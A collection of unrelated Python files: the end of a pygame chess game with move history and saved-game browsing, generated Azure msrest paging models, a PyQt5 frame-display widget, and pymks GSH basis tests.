if random % 2 == 0:
self.selected_color = "white"
else:
self.selected_color = "black"
self.is_menu = False
self.is_game = True
self.viewing_game_in_db = False
self.current_game_in_bd_viewed = None
elif button[0] == "Black":
self.selected_color = "black"
self.is_menu = False
self.is_game = True
self.viewing_game_in_db = False
self.current_game_in_bd_viewed = None
elif button[0] == "Game History":
self.is_menu = False
self.is_game = False
self.is_history = True
self.list_games = self.game_history_DAO.get_all_games()
self.list_games.reverse()
self.first_game_DB = 0
self.last_game_DB = 7
self.page_chosen = False
self.tick = 0
self.viewing_game_in_db = True
elif self.is_game:
if not self.are_players_initialized:
self.board = board(self.selected_color)
self.initialize_players()
self.are_players_initialized = True
if not self.game_started:
self.game_started = True
self.start_game()
self.show_game()
##################################################### GAME LOOP ###################################################
if not self.board.game_over and not self.viewing_game_in_db:
# human player turn
if self.player_turn == self.players[0]:
if self.mouse != None and not self.board.upgrading_pawn:
square_size = self.board.position[0][0].size
if self.mouse[0] >= self.starting_pos_left and self.mouse[0] <= self.starting_pos_left + (8 * square_size):
if self.mouse[1] >= self.starting_pos_left and self.mouse[1] <= self.starting_pos_top + (8 * square_size):
#row and column selection
row = math.floor((self.mouse[1]-self.starting_pos_top)/square_size)
column = math.floor((self.mouse[0]-self.starting_pos_left)/square_size)
#piece is selected
self.player_turn.choose_move(row, column)
#piece destination is selected
if self.player_turn.starting_row != None and self.player_turn.starting_column != None and (row != self.player_turn.starting_row or column != self.player_turn.starting_column):
if self.player_turn.verify_move(row, column):
self.player_turn.valid_positions = self.player_turn.play_move(row, column)
self.player_turn.starting_row = None
self.player_turn.starting_column = None
self.played_row = row
self.played_column = column
if not self.board.upgrading_pawn:
self.played_row = None
self.played_column = None
self.change_player_turn()
self.show_game()
#show possible moves
if self.player_turn == self.players[0]:
if self.player_turn.starting_row != None and self.player_turn.starting_column != None:
self.show_valid_positions(self.player_turn.valid_positions)
else:
# human opponent
if self.game_mode == "Human":
if self.mouse != None and not self.board.upgrading_pawn:
square_size = self.board.position[0][0].size
if self.mouse[0] >= self.starting_pos_left and self.mouse[0] <= self.starting_pos_left + (8 * square_size):
if self.mouse[1] >= self.starting_pos_left and self.mouse[1] <= self.starting_pos_top + (8 * square_size):
#row and column selection
row = math.floor((self.mouse[1]-self.starting_pos_top)/square_size)
column = math.floor((self.mouse[0]-self.starting_pos_left)/square_size)
#piece is selected
self.player_turn.choose_move(row, column)
#piece destination is selected
if self.player_turn.starting_row != None and self.player_turn.starting_column != None and (row != self.player_turn.starting_row or column != self.player_turn.starting_column):
if self.player_turn.verify_move(row, column):
self.player_turn.valid_positions = self.player_turn.play_move(row, column)
self.player_turn.starting_row = None
self.player_turn.starting_column = None
self.played_row = row
self.played_column = column
if not self.board.upgrading_pawn:
self.played_row = None
self.played_column = None
self.change_player_turn()
self.show_game()
#show possible moves
if self.player_turn == self.players[1]:
if self.player_turn.starting_row != None and self.player_turn.starting_column != None:
self.show_valid_positions(self.player_turn.valid_positions)
# ai opponent
else:
if wait_time > 0:
self.player_turn.play_move()
self.change_player_turn()
wait_time += 1
if self.mouse != None:
for button in self.game_button_positions: # button: [texte, left, top, width, height]
if self.mouse[0] >= button[1] and self.mouse[0] <= button[1] + button[3] and self.mouse[1] >= button[2] and self.mouse[1] <= button[2] + button[4]:
if button[0] == "<<":
if not self.viewing_game_in_db:
if len(self.board.game_information["Moves"]) > 1:
self.viewing_current_move = False
self.board.viewing_index = 0
else:
self.viewing_index = 0
elif button[0] == "<":
if not self.viewing_game_in_db:
if len(self.board.game_information["Moves"]) > 1:
self.viewing_current_move = False
if self.board.viewing_index > 0:
self.board.viewing_index -= 1
else:
if self.viewing_index > 0:
self.viewing_index -= 1
elif button[0] == ">":
if not self.viewing_game_in_db:
if len(self.board.game_information["Moves"]) > 0 and self.board.viewing_index < len(self.board.game_information["Moves"]) - 1:
self.viewing_current_move = False
self.board.viewing_index += 1
if len(self.board.game_information["Moves"]) > 0 and self.board.viewing_index == len(self.board.game_information["Moves"]) - 1:
self.viewing_current_move = True
else:
if len(self.current_game_in_bd_viewed["Moves"]) > 0 and self.viewing_index < len(self.current_game_in_bd_viewed["Moves"]) - 1 :
self.viewing_index += 1
elif button[0] == ">>":
if not self.viewing_game_in_db:
if len(self.board.game_information["Moves"]) > 0:
self.viewing_current_move = True
self.board.viewing_index = len(self.board.game_information["Moves"]) - 1
else:
self.viewing_index = len(self.current_game_in_bd_viewed["Moves"]) - 1
elif button[0] == "Forfeit Game":
self.board.game_over = True
self.board.game_over_result = "Forfeit"
if self.board.human_player_color == "white":
self.board.winner = "Black"
else:
self.board.winner = "White"
elif button[0] == "Main Menu":
self.is_menu = True
self.is_game = False
self.select_color = False
self.are_players_initialized = False
self.game_started = False
self.viewing_index = 0
self.select_color = False
elif button[0] == "Queen":
self.pawn_upgrade_chosen = "queen"
elif button[0] == "Rook":
self.pawn_upgrade_chosen = "rook"
elif button[0] == "Bishop":
self.pawn_upgrade_chosen = "bishop"
elif button[0] == "Knight":
self.pawn_upgrade_chosen = "knight"
if self.board.upgrading_pawn and self.pawn_upgrade_chosen != None:
self.board.upgrade_pawn(self.played_row, self.played_column, self.board.upgrading_pawn_color, self.pawn_upgrade_chosen)
self.board.upgrading_pawn = False
self.pawn_upgrade_chosen = None
self.played_row = None
self.played_column = None
self.change_player_turn()
self.show_game()
if self.board.game_over and not self.viewing_game_in_db:
if not self.game_saved:
self.save_game()
self.game_saved = True
##################################################### GAME LOOP ###################################################
elif self.is_history:
self.show_history()
self.tick += 1
if self.mouse != None:
for button in self.history_button_positions: # button: [texte, left, top, width, height]
if self.mouse[0] >= button[1] and self.mouse[0] <= button[1] + button[3] and self.mouse[1] >= button[2] and self.mouse[1] <= button[2] + button[4]:
if button[0] == "Main Menu":
self.is_menu = True
self.is_history = False
self.select_color = False
elif "View Game" in button[0]:
self.viewing_game_in_db = True
game_id = int(button[0].split()[-1])
for game in self.list_games:
if game["_id"] == game_id:
self.current_game_in_bd_viewed = game
self.is_history = False
self.is_game = True
elif button[0] == "Last page":
if self.first_game_DB > 0 and not self.page_chosen:
self.first_game_DB -= 7
self.last_game_DB -= 7
self.page_chosen = True
elif button[0] == "Next page":
if self.last_game_DB < len(self.list_games) and not self.page_chosen:
self.first_game_DB += 7
self.last_game_DB += 7
self.page_chosen = True
if self.tick >= 6:
self.page_chosen = False
self.tick = 0
self.window.blit(self.screen, (0,0))
pygame.display.update()
self.mouse = None
pygame.quit()
##################################################### FUNCTIONS ###################################################
def show_menu(self):
pygame.display.set_caption("Main Menu")
self.screen.fill(self.gray)
#titles
font = pygame.font.SysFont("Arial", 75)
title_1 = font.render("CHESS ENGINE", True, self.black)
title_1_rect = title_1.get_rect(center=(self.width//2, 60))
title_2 = font.render("GAMBYTE", True, self.black)
title_2_rect = title_2.get_rect(center=(self.width//2, 140))
self.screen.blit(title_1, title_1_rect)
self.screen.blit(title_2, title_2_rect)
#buttons
pos_play_human = self.draw_button("Play vs Human", 30, self.white, self.black, 400, 300, 70, 10, False)
pos_play_ai = self.draw_button("Play vs AI", 30, self.white, self.black, 800, 300, 100, 10, False)
pos_history = self.draw_button("Game History", 30, self.white, self.black, 100, 550, 175, 10, True)
if self.select_color:
font = pygame.font.SysFont("Arial", 30)
mode = "Game mode selected: Human VS " + self.game_mode
game_mode = font.render(mode, True, self.black)
game_mode_rect = game_mode.get_rect(center=(self.width//2, 240))
choose_color = font.render("Choose color to start game:", True, self.black)
choose_color_text = choose_color.get_rect(center=(self.width//2, 370))
self.screen.blit(game_mode, game_mode_rect)
self.screen.blit(choose_color, choose_color_text)
pos_white = self.draw_button("White", 30, self.black, self.white, 450, 430, 10, 10, False)
pos_random = self.draw_button("Random", 30, self.white, self.light_black, 100, 430, 10, 10, True)
pos_black = self.draw_button("Black", 30, self.white, self.black, 750, 430, 10, 10, False)
if self.color_buttons_init:
self.color_buttons_init = False
self.menu_button_positions.append(pos_white)
self.menu_button_positions.append(pos_random)
self.menu_button_positions.append(pos_black)
if self.game_mode_buttons_init:
self.game_mode_buttons_init = False
self.menu_button_positions.append(pos_play_human)
self.menu_button_positions.append(pos_play_ai)
self.menu_button_positions.append(pos_history)
def show_game(self):
pygame.display.set_caption("Game")
self.screen.fill(self.gray)
left = self.starting_pos_left
top = self.starting_pos_top
color_switch = False
color = self.orange
square_size = None
value = 0
letter_value = 0
font = pygame.font.SysFont("Arial", 30)
#letter/number of squares depending orientation of board
if not self.viewing_game_in_db:
if self.selected_color == "white":
col_text = self.white_bottom_column_values
row_text = self.white_bottom_row_values
else:
col_text = self.black_bottom_column_values
row_text = self.black_bottom_row_values
else:
moves = list(self.current_game_in_bd_viewed["Moves"].keys())
if self.current_game_in_bd_viewed["Moves"][moves[0]][1][0] == "black":
col_text = self.white_bottom_column_values
row_text = self.white_bottom_row_values
else:
col_text = self.black_bottom_column_values
row_text = self.black_bottom_row_values
for row in self.board.position:
#draw row value
value_text = font.render(row_text[value], True, self.black)
value_text_rect = value_text.get_rect(center=(self.starting_pos_left - 20 , top + 35))
self.screen.blit(value_text, value_text_rect)
value += 1
for square in row:
if color_switch:
color = self.beige
color_switch = False
else:
color = self.orange
color_switch = True
#draw squares
square_size = square.size
pygame.draw.rect(self.screen, color, (left, top, square_size, square_size))
#show pieces on squares
if self.viewing_current_move and not self.viewing_game_in_db: #if its the current move, otherwise show the positions of past moves
square_piece = square.get_piece()
if square_piece != None:
path = str(self.path + square_piece.color + "_" + square_piece.name + ".png")
piece_image = pygame.image.load(path)
piece_image = pygame.transform.scale(piece_image, (square_size, square_size))
piece_image.convert()
self.screen.blit(piece_image, (left, top, square_size, square_size))
else:
if not self.viewing_game_in_db:
piece_list = list(self.board.game_information["Moves"].values())[self.board.viewing_index]
else:
piece_list = list(self.current_game_in_bd_viewed["Moves"].values())[self.viewing_index]
counter = 0
for piece_info in piece_list:
counter += 1
if counter != 1:
if square.row == piece_info[2] and square.column == piece_info[3]:
path = str(self.path + piece_info[0] + "_" + piece_info[1] + ".png")
piece_image = pygame.image.load(path)
piece_image = pygame.transform.scale(piece_image, (square_size, square_size))
piece_image.convert()
self.screen.blit(piece_image, (left, top, square_size, square_size))
#draw column letter
if value == 7:
letter_text = font.render(col_text[letter_value], True, self.black)
letter_text_rect = letter_text.get_rect(center=(left + square_size/2, top + square_size*2 + 20))
self.screen.blit(letter_text, letter_text_rect)
letter_value += 1
left += square_size
top += square_size
left = self.starting_pos_left
if color_switch:
color = self.beige
color_switch = False
else:
color = self.orange
color_switch = True
if self.current_game_in_bd_viewed:
font = pygame.font.SysFont("Arial", 40)
piece_list = list(self.current_game_in_bd_viewed["Moves"].values())
piece_position_at_index = piece_list[self.viewing_index]
evaluation_text = font.render("Evaluation: " + str((piece_position_at_index[0][0])), True, self.black)
evaluation_text_rect = evaluation_text.get_rect(center=(800, 70))
self.screen.blit(evaluation_text, evaluation_text_rect)
#show the list of moves done
info_square_left = square_size*8 + self.starting_pos_left*2
info_square_top = square_size*2 + self.starting_pos_top
info_square_width = square_size*6
info_square_height = square_size*4
pygame.draw.rect(self.screen, self.black, (info_square_left, info_square_top, info_square_width, info_square_height))
move_names = self.get_move_names()
font = pygame.font.SysFont("Arial", 15)
top_pos = 10
nb_rows = 0
for row in move_names:
nb_rows += 1
names = font.render(row, True, self.white)
names_rect = names.get_rect(center=(info_square_left + info_square_width/2, info_square_top + top_pos))
self.screen.blit(names, names_rect)
top_pos += 20
if nb_rows == 15:
break
#buttons to move through the list
first_move_button = self.draw_button("<<", 30, self.white, self.light_black, info_square_left + 80, info_square_top - square_size/2, info_square_width/15, 5, False)
prior_move_button = self.draw_button("<", 30, self.white, self.light_black, info_square_left + (info_square_left/8)+ 80, info_square_top - square_size/2, info_square_width/15, 5, False)
next_move_button = self.draw_button(">", 30, self.white, self.light_black, info_square_left + 2*(info_square_left/8)+ 120, info_square_top - square_size/2, info_square_width/15, 5, False)
last_move_button = self.draw_button(">>", 30, self.white, self.light_black, info_square_left + 3*(info_square_left/8)+ 120, info_square_top - square_size/2, info_square_width/15, 5, False)
if not self.viewing_game_in_db:
forfeit_button = self.draw_button("Forfeit Game", 30, self.white, self.light_black, info_square_left + info_square_width/2, info_square_top + info_square_height + 40, info_square_width/4, 10, False)
self.game_button_positions.append(forfeit_button)
if self.board.game_over and not self.viewing_game_in_db:
return_menu_button = self.draw_button("Main Menu", 30, self.white, self.black, 1100, 45, 20, 10, False)
self.game_button_positions.append(return_menu_button)
elif self.viewing_game_in_db:
return_menu_button = self.draw_button("Main Menu", 30, self.white, self.black, 1100, 45, 20, 10, False)
self.game_button_positions.append(return_menu_button)
if self.game_buttons_init:
self.game_buttons_init = False
self.game_button_positions.append(first_move_button)
self.game_button_positions.append(prior_move_button)
self.game_button_positions.append(next_move_button)
self.game_button_positions.append(last_move_button)
if self.game_started and self.viewing_current_move and not self.viewing_game_in_db:
font = pygame.font.SysFont("Arial", 30)
turn_to_play = "Turn to play: "+ self.player_turn.color
turn_to_play_text = font.render(turn_to_play, True, self.black)
turn_to_play_text_rect = turn_to_play_text.get_rect(center=(150, 25))
self.screen.blit(turn_to_play_text, turn_to_play_text_rect)
self.show_checks_and_checkmates()
if (self.game_started and len(self.board.game_information["Moves"]) > 0) or self.viewing_game_in_db:
font = pygame.font.SysFont("Arial", 30)
if not self.viewing_game_in_db:
keys_list = list(self.board.game_information["Moves"].keys())
board_state = "Board state with last move: " + keys_list[self.board.viewing_index]
else:
keys_list = list(self.current_game_in_bd_viewed["Moves"].keys())
board_state = "Board state with last move: " + keys_list[self.viewing_index]
board_state_text = font.render(board_state, True, self.black)
board_state_text_rect = board_state_text.get_rect(center=(info_square_left + info_square_width/2, info_square_top + info_square_height * 1.4))
self.screen.blit(board_state_text, board_state_text_rect)
if self.board.upgrading_pawn and not self.viewing_game_in_db:
#if 1 == 1 and not self.viewing_game_in_db:
upgrade_left = info_square_left-30
upgrade_top = 10
upgrade_width = info_square_width+60
upgrade_height = 120
pygame.draw.rect(self.screen, self.gray, (upgrade_left, upgrade_top, upgrade_width, upgrade_height))
upgrade_pawn_text = font.render("Upgrade pawn", True, self.black)
upgrade_pawn_text_rect = upgrade_pawn_text.get_rect(center=(upgrade_left + upgrade_width/2, 25))
self.screen.blit(upgrade_pawn_text, upgrade_pawn_text_rect)
queen_button = self.draw_button("Queen", 25, self.white, self.black, upgrade_left + 65, upgrade_top + upgrade_height/2 + 15, 12, 10, False)
self.game_button_positions.append(queen_button)
rook_button = self.draw_button("Rook", 25, self.white, self.black, upgrade_left + upgrade_width/4 + 67, upgrade_top + upgrade_height/2 + 15, 16, 10, False)
self.game_button_positions.append(rook_button)
bishop_button = self.draw_button("Bishop", 25, self.white, self.black, upgrade_left + upgrade_width/4*2 + 72, upgrade_top + upgrade_height/2 + 15, 10, 10, False)
self.game_button_positions.append(bishop_button)
knight_button = self.draw_button("Knight", 25, self.white, self.black, upgrade_left + upgrade_width/4*3 + 65, upgrade_top + upgrade_height/2 + 15, 10, 10, False)
self.game_button_positions.append(knight_button)
def show_history(self):
pygame.display.set_caption("History")
self.screen.fill(self.gray)
return_menu_button = self.draw_button("Main Menu", 30, self.white, self.black, 1100, 45, 20, 10, False)
self.history_button_positions.append(return_menu_button)
last_page_button = self.draw_button("Last page", 30, self.white, self.black, 400, 655, 20, 10, False)
self.history_button_positions.append(last_page_button)
next_page_button = self.draw_button("Next page", 30, self.white, self.black, 800, 655, 20, 10, False)
self.history_button_positions.append(next_page_button)
font = pygame.font.SysFont("Arial", 25)
page = "Page " + str(int(self.last_game_DB/7)) + " of " + str(int(len(self.list_games)/7 + 1))
page_text = font.render(page, True, self.black)
page_text_rect = page_text.get_rect(center=(600, 655))
self.screen.blit(page_text, page_text_rect)
font = pygame.font.SysFont("Arial", 40)
date_text = font.render("Date", True, self.black)
date_text_rect = date_text.get_rect(center=(150, 45))
self.screen.blit(date_text, date_text_rect)
result_text = font.render("Result", True, self.black)
result_text_rect = result_text.get_rect(center=(350, 45))
self.screen.blit(result_text, result_text_rect)
winner_text = font.render("Winner", True, self.black)
winner_text_rect = winner_text.get_rect(center=(550, 45))
self.screen.blit(winner_text, winner_text_rect)
nb_text = font.render("Number of moves", True, self.black)
nb_text_rect = nb_text.get_rect(center=(800, 45))
self.screen.blit(nb_text, nb_text_rect)
font = pygame.font.SysFont("Arial", 25)
top_pos = 150
for i in range(self.first_game_DB, self.last_game_DB):
if i == len(self.list_games):
break
game_date_text = font.render(self.list_games[i]["Date"], True, self.black)
game_date_text_rect = game_date_text.get_rect(center=(150, top_pos))
self.screen.blit(game_date_text, game_date_text_rect)
game_result_text = font.render(self.list_games[i]["Result"], True, self.black)
game_result_text_rect = game_result_text.get_rect(center=(350, top_pos))
self.screen.blit(game_result_text, game_result_text_rect)
game_winner_text = font.render(self.list_games[i]["Winner"], True, self.black)
game_winner_text_rect = game_winner_text.get_rect(center=(550, top_pos))
self.screen.blit(game_winner_text, game_winner_text_rect)
game_nb_text = font.render(str(len(self.list_games[i]["Moves"])), True, self.black)
game_nb_text_rect = game_nb_text.get_rect(center=(800, top_pos))
self.screen.blit(game_nb_text, game_nb_text_rect)
view_game_button = self.draw_button("View Game " + str(self.list_games[i]["_id"]), 25, self.white, self.light_black, 1000, top_pos, 10, 5, False)
self.history_button_positions.append(view_game_button)
top_pos += 60
def draw_button(self, text, font_size, font_color, color, left, top, border_size_width, border_size_height, is_centered):
font = pygame.font.SysFont("Arial", font_size)
message = font.render(text, True, font_color)
if is_centered:
message_rect = message.get_rect(center=(self.width//2, top))
else:
message_rect = message.get_rect(center=(left, top))
button = pygame.draw.rect(self.screen, color, (message_rect[0] - border_size_width, message_rect[1] - border_size_height, message.get_width() + (border_size_width * 2), message.get_height() + (border_size_height * 2)))
self.screen.blit(message, message_rect)
return [text, message_rect[0] - border_size_width, message_rect[1] - border_size_height, message.get_width() + (border_size_width * 2), message.get_height() + (border_size_height * 2)]
def initialize_players(self):
self.players = []
if self.selected_color == "white":
self.board.bottom_color = "white"
opponent_color = "black"
else:
opponent_color = "white"
self.board.bottom_color = "black"
if self.game_mode == "Human":
self.board.bottom_color = self.selected_color
self.players.append(human(self.selected_color, self.board))
self.players.append(human(opponent_color, self.board))
else:
self.players.append(human(self.selected_color, self.board))
self.players.append(ai(opponent_color, self.board))
def start_game(self):
if self.players[0].color == "white":
self.player_turn = self.players[0]
else:
self.player_turn = self.players[1]
self.game_saved = False
def change_player_turn(self):
if self.player_turn == self.players[0]:
self.player_turn = self.players[1]
else:
self.player_turn = self.players[0]
if self.board.color_to_play == "white":
self.board.color_to_play = "black"
else:
self.board.color_to_play = "white"
def show_valid_positions(self, valid_positions):
if self.viewing_current_move:
for position in valid_positions:
pygame.draw.circle(self.screen, self.green, (self.starting_pos_left + (75 * position[1]) + 75 / 2, self.starting_pos_top + (75 * position[0]) + 75 / 2), 5)
def show_checks_and_checkmates(self):
if self.board.white_king_pos != None and self.board.black_king_pos != None:
font = pygame.font.SysFont("Arial", 30)
if self.board.is_king_in_checkmate("white") != False:
self.board.game_over = True
if self.board.is_king_in_checkmate("white") == "Checkmate":
checkmate = font.render("White King Checkmate", True, self.black)
checkmate_rect = checkmate.get_rect(center=(525, 25))
self.screen.blit(checkmate, checkmate_rect)
self.board.game_over_result = "Checkmate"
self.board.winner = "Black"
else:
stalemate = font.render("White King Stalemate", True, self.black)
stalemate_rect = stalemate.get_rect(center=(525, 25))
self.screen.blit(stalemate, stalemate_rect)
self.board.game_over_result = "Stalemate"
self.board.winner = "Draw"
elif self.board.is_king_in_checkmate("black") != False:
self.board.game_over = True
if self.board.is_king_in_checkmate("black") == "Checkmate":
checkmate = font.render("Black King Checkmate", True, self.black)
checkmate_rect = checkmate.get_rect(center=(525, 25))
self.screen.blit(checkmate, checkmate_rect)
self.board.game_over_result = "Checkmate"
self.board.winner = "White"
else:
stalemate = font.render("Black King Stalemate", True, self.black)
stalemate_rect = stalemate.get_rect(center=(525, 25))
self.screen.blit(stalemate, stalemate_rect)
self.board.game_over_result = "Stalemate"
self.board.winner = "Draw"
elif self.board.is_king_in_check(self.board.white_king_pos[0], self.board.white_king_pos[1]):
check = font.render("White King Check", True, self.black)
check_rect = check.get_rect(center=(550, 25))
self.screen.blit(check, check_rect)
elif self.board.is_king_in_check(self.board.black_king_pos[0], self.board.black_king_pos[1]):
check = font.render("Black King Check", True, self.black)
check_rect = check.get_rect(center=(550, 25))
self.screen.blit(check, check_rect)
def save_game(self):
self.board.game_information["_id"] = self.game_history_DAO.get_next_id()
self.board.game_information["Winner"] = self.board.winner
self.board.game_information["Result"] = self.board.game_over_result
self.board.game_information["Date"] = datetime.now().strftime("%d/%m/%Y, %H:%M:%S")
self.game_history_DAO.save_game(self.board.game_information)
def get_move_names(self):
if not self.viewing_game_in_db:
keys = self.board.game_information["Moves"].keys()
else:
keys = self.current_game_in_bd_viewed["Moves"].keys()
move_names = []
row = []
move_row = ""
counter = 0
#changes row after 9 moves for display
for key in keys:
if key != "Winner" or key != "Result" or key != "Date":
counter += 1
move_row += (" " + key)
if counter >= 8:
move_names.append(move_row)
counter = 0
move_row = ""
if len(move_row) > 0:
move_names.append(move_row)
return move_names
if __name__ == "__main__":
chess_game = chess_game()
chess_game.main() |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class CustomParameterGroup(msrest.serialization.Model):
"""Parameter group.
All required parameters must be populated in order to send to Azure.
:param api_version: Required. Sets the api version to use.
:type api_version: str
:param tenant: Required. Sets the tenant to use.
:type tenant: str
"""
_validation = {
"api_version": {"required": True},
"tenant": {"required": True},
}
_attribute_map = {
"api_version": {"key": "api_version", "type": "str"},
"tenant": {"key": "tenant", "type": "str"},
}
def __init__(self, **kwargs):
super(CustomParameterGroup, self).__init__(**kwargs)
self.api_version = kwargs["api_version"]
self.tenant = kwargs["tenant"]
class OdataProductResult(msrest.serialization.Model):
"""OdataProductResult.
:param values:
:type values: list[~paging.models.Product]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
"values": {"key": "values", "type": "[Product]"},
"odata_next_link": {"key": "odata\\.nextLink", "type": "str"},
}
def __init__(self, **kwargs):
super(OdataProductResult, self).__init__(**kwargs)
self.values = kwargs.get("values", None)
self.odata_next_link = kwargs.get("odata_next_link", None)
class OperationResult(msrest.serialization.Model):
"""OperationResult.
:param status: The status of the request. Possible values include: "Succeeded", "Failed",
"canceled", "Accepted", "Creating", "Created", "Updating", "Updated", "Deleting", "Deleted",
"OK".
:type status: str or ~paging.models.OperationResultStatus
"""
_attribute_map = {
"status": {"key": "status", "type": "str"},
}
def __init__(self, **kwargs):
super(OperationResult, self).__init__(**kwargs)
self.status = kwargs.get("status", None)
class PagingGetMultiplePagesLroOptions(msrest.serialization.Model):
"""Parameter group.
:param maxresults: Sets the maximum number of items to return in the response.
:type maxresults: int
:param timeout: Sets the maximum time that the server can spend processing the request, in
seconds. The default is 30 seconds.
:type timeout: int
"""
_attribute_map = {
"maxresults": {"key": "maxresults", "type": "int"},
"timeout": {"key": "timeout", "type": "int"},
}
def __init__(self, **kwargs):
super(PagingGetMultiplePagesLroOptions, self).__init__(**kwargs)
self.maxresults = kwargs.get("maxresults", None)
self.timeout = kwargs.get("timeout", 30)
class PagingGetMultiplePagesOptions(msrest.serialization.Model):
"""Parameter group.
:param maxresults: Sets the maximum number of items to return in the response.
:type maxresults: int
:param timeout: Sets the maximum time that the server can spend processing the request, in
seconds. The default is 30 seconds.
:type timeout: int
"""
_attribute_map = {
"maxresults": {"key": "maxresults", "type": "int"},
"timeout": {"key": "timeout", "type": "int"},
}
def __init__(self, **kwargs):
super(PagingGetMultiplePagesOptions, self).__init__(**kwargs)
self.maxresults = kwargs.get("maxresults", None)
self.timeout = kwargs.get("timeout", 30)
class PagingGetMultiplePagesWithOffsetOptions(msrest.serialization.Model):
"""Parameter group.
All required parameters must be populated in order to send to Azure.
:param maxresults: Sets the maximum number of items to return in the response.
:type maxresults: int
:param offset: Required. Offset of return value.
:type offset: int
:param timeout: Sets the maximum time that the server can spend processing the request, in
seconds. The default is 30 seconds.
:type timeout: int
"""
_validation = {
"offset": {"required": True},
}
_attribute_map = {
"maxresults": {"key": "maxresults", "type": "int"},
"offset": {"key": "offset", "type": "int"},
"timeout": {"key": "timeout", "type": "int"},
}
def __init__(self, **kwargs):
super(PagingGetMultiplePagesWithOffsetOptions, self).__init__(**kwargs)
self.maxresults = kwargs.get("maxresults", None)
self.offset = kwargs["offset"]
self.timeout = kwargs.get("timeout", 30)
class PagingGetOdataMultiplePagesOptions(msrest.serialization.Model):
"""Parameter group.
:param maxresults: Sets the maximum number of items to return in the response.
:type maxresults: int
:param timeout: Sets the maximum time that the server can spend processing the request, in
seconds. The default is 30 seconds.
:type timeout: int
"""
_attribute_map = {
"maxresults": {"key": "maxresults", "type": "int"},
"timeout": {"key": "timeout", "type": "int"},
}
def __init__(self, **kwargs):
super(PagingGetOdataMultiplePagesOptions, self).__init__(**kwargs)
self.maxresults = kwargs.get("maxresults", None)
self.timeout = kwargs.get("timeout", 30)
class Product(msrest.serialization.Model):
"""Product.
:param properties:
:type properties: ~paging.models.ProductProperties
"""
_attribute_map = {
"properties": {"key": "properties", "type": "ProductProperties"},
}
def __init__(self, **kwargs):
super(Product, self).__init__(**kwargs)
self.properties = kwargs.get("properties", None)
class ProductProperties(msrest.serialization.Model):
"""ProductProperties.
:param id:
:type id: int
:param name:
:type name: str
"""
_attribute_map = {
"id": {"key": "id", "type": "int"},
"name": {"key": "name", "type": "str"},
}
def __init__(self, **kwargs):
super(ProductProperties, self).__init__(**kwargs)
self.id = kwargs.get("id", None)
self.name = kwargs.get("name", None)
class ProductResult(msrest.serialization.Model):
"""ProductResult.
:param values:
:type values: list[~paging.models.Product]
:param next_link:
:type next_link: str
"""
_attribute_map = {
"values": {"key": "values", "type": "[Product]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(self, **kwargs):
super(ProductResult, self).__init__(**kwargs)
self.values = kwargs.get("values", None)
self.next_link = kwargs.get("next_link", None)
class ProductResultValue(msrest.serialization.Model):
"""ProductResultValue.
:param value:
:type value: list[~paging.models.Product]
:param next_link:
:type next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[Product]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(self, **kwargs):
super(ProductResultValue, self).__init__(**kwargs)
self.value = kwargs.get("value", None)
self.next_link = kwargs.get("next_link", None)
class ProductResultValueWithXMSClientName(msrest.serialization.Model):
"""ProductResultValueWithXMSClientName.
:param indexes:
:type indexes: list[~paging.models.Product]
:param next_link:
:type next_link: str
"""
_attribute_map = {
"indexes": {"key": "values", "type": "[Product]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(self, **kwargs):
super(ProductResultValueWithXMSClientName, self).__init__(**kwargs)
self.indexes = kwargs.get("indexes", None)
self.next_link = kwargs.get("next_link", None)
|
from PyQt5.QtWidgets import QWidget
from .RemoteSpyUI import Ui_RemoteSpy
class RemoteSpyForm(QWidget):
parent = None
def __init__(self, parent=None):
super(RemoteSpyForm, self).__init__()
self.parent = parent
self.frame_proportion = 9 / 16
self.ui = Ui_RemoteSpy()
self.ui.setupUi(self)
self.ui.screen_display.move(0, 0)
def update_frame(self, frame):
screen_display_object = self.ui.screen_display
screen_display_object.setPixmap(frame)
def paintEvent(self, event):
container_size = self.size()
container_height = container_size.height()
container_width = container_size.width()
container_proportion = container_height / container_width
screen_height = container_height
screen_width = container_width
if container_proportion > self.frame_proportion:
container_height = int(screen_width * self.frame_proportion)
elif container_proportion < self.frame_proportion:
container_width = int(screen_height / self.frame_proportion)
self.ui.screen_display.resize(container_width, container_height)
self.resize(container_width, container_height)
def closeEvent(self, event):
self.parent.toggle_remote_spy(False)
|
import numpy as np
from pymks.bases import GSHBasis
def test_gsh_no_symmetry():
"""this test checks that a particular gsh basis function with no
symmetry is being evaluated properly"""
X = np.array([[0.1, 0.2, 0.3],
[6.5, 2.3, 3.4]])
gsh_basis = GSHBasis(n_states=[1])
assert(np.allclose(np.squeeze(gsh_basis.discretize(X)), q_no_symm(X)))
def test_gsh_hex():
"""this test checks that a particular gsh basis function for hexagonal
symmetry is being evaluated properly"""
X = np.array([[0.1, 0.2, 0.3],
[6.5, 2.3, 3.4]])
gsh_basis = GSHBasis(n_states=[1], domain='hexagonal')
assert(np.allclose(np.squeeze(gsh_basis.discretize(X)), q_hex(X)))
def test_symmetry_check_hex():
"""this test is designed to check that the hexagonal gsh functions
for two symmetrically equivalent orientations output the same gsh
coefficients"""
X1 = np.array([[30, 70, 45]])*np.pi/180.
X2 = np.array([[30+180, 180-70, 2*60-45]])*np.pi/180.
gsh_basis = GSHBasis(n_states=np.arange(0, 100, 5), domain='hexagonal')
assert(np.allclose(gsh_basis.discretize(X1), gsh_basis.discretize(X2)))
def q_hex(x):
phi1 = x[:, 0]
phi = x[:, 1]
t913 = np.sin(phi)
x_GSH = -((0.5e1 / 0.4e1) * np.exp((-2*1j) * phi1) *
np.sqrt(0.6e1) * t913 ** 2)
return x_GSH
def q_no_symm(x):
phi1 = x[:, 0]
phi = x[:, 1]
phi2 = x[:, 2]
x_GSH = ((0.3e1 / 0.2e1) * (0.1e1 + np.cos(phi)) *
np.exp((-1*1j) * (phi1 + phi2)))
return x_GSH
if __name__ == '__main__':
test_gsh_no_symmetry()
test_gsh_hex()
test_symmetry_check_hex()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
